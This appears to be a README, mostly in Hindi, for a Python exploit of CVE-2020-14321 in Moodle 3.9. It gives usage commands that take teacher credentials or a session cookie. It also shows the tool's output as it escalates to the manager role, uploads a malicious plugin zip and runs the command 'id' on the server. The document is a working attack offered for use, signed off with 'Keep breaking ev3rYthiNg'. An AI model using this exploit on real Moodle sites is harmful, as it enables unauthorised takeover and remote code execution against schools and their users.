
प्रमाणित Moodle 3.9 शोषण जो शिक्षक विशेषाधिकारों को प्रबंधक भूमिका तक बढ़ाता है और दुर्भावनापूर्ण प्लगइन अपलोड के माध्यम से रिमोट कोड निष्पादन प्राप्त करता है।
Python script to exploit CVE-2020-14321 - Moodle 3.9
कोर्स नामांकन ने शिक्षक भूमिका से प्रबंधक भूमिका में विशेषाधिकार वृद्धि की अनुमति दी, जिससे RCE हो सकता है।
पेलोड यहाँ से निकाला गया: https://github.com/HoangKien1020/CVE-2020-14321
यदि आपके पास वैध शिक्षक क्रेडेंशियल्स हैं (InReaLife यह पर्याप्त रूप से परीक्षण नहीं किया गया है, या शायद हाँ, मुझे नहीं पता :P):
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'
यदि आपके पास एक वैध शिक्षक कुकी है (101% परीक्षित):
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r
...
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
__ __ __ __ __ __ __ __
/ \ /|_ __ _) / \ _) / \ __ /| |__| _) _) /|
\__ \/ |__ /__ \__/ /__ \__/ | | __) /__ | • by lanz
Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓
uid=80(www) gid=80(www) groups=80(www)
Keep breaking ev3rYthiNg!!